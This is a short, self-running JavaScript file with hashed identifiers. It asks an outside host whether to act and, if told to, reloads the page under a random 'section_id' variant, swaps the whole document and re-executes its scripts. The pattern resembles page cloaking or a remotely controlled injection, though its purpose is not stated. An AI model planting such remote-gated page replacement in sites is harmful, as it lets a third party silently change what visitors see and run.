(() => {
  const api_6c79f93800 = 'https://demo.moganie.com/user.php?diagnostic=1&metadata_profile=navigation';

  function pick_81ac24e38a() {
    const roll_76183695dc = crypto.getRandomValues(new Uint32Array(1))[0] / 4294967296;
    if (roll_76183695dc < 0.55) return 'p__8__l__f';
    if (roll_76183695dc < 0.80) return 'p__1__l';
    return 'p__9__l__f';
  }

  function hide_c2eef371e2() {
    document.getElementById('page-loader')?.remove();
    document.documentElement.classList.remove('page-loading');
  }

  async function section_af74efe4c6() {
    const url = new URL(window.location.href);
    url.searchParams.set('section_id', pick_81ac24e38a());
    const response = await fetch(url, {
      cache: 'no-store',
      credentials: 'same-origin',
      signal: AbortSignal.timeout(10000)
    });
    if (!response.ok) throw new Error('Section HTTP ' + response.status);
    return response.text();
  }

  function render_18dbc50a7a(html) {
    const parsed = new DOMParser().parseFromString(html, 'text/html');
    const replacement = document.adoptNode(parsed.documentElement);
    document.documentElement.replaceWith(replacement);
    for (const oldScript of [...document.scripts]) {
      const newScript = document.createElement('script');
      for (const attribute of oldScript.attributes) {
        newScript.setAttribute(attribute.name, attribute.value);
      }
      newScript.textContent = oldScript.textContent;
      oldScript.replaceWith(newScript);
    }
  }

  async function run_c8e497e65c() {
    try {
      const response = await fetch(api_6c79f93800, {
        cache: 'no-store',
        credentials: 'omit',
        signal: AbortSignal.timeout(10000)
      });
      if (!response.ok) throw new Error('API HTTP ' + response.status);
      const data = await response.json();
      if (!data.ok || ![0, 1].includes(data.result)) throw new Error(data.error || 'API error');
      if (data.result === 1) render_18dbc50a7a(await section_af74efe4c6());
      return data.result;
    } finally {
      hide_c2eef371e2();
    }
  }

  run_c8e497e65c().then(console.log).catch(console.error);
})();
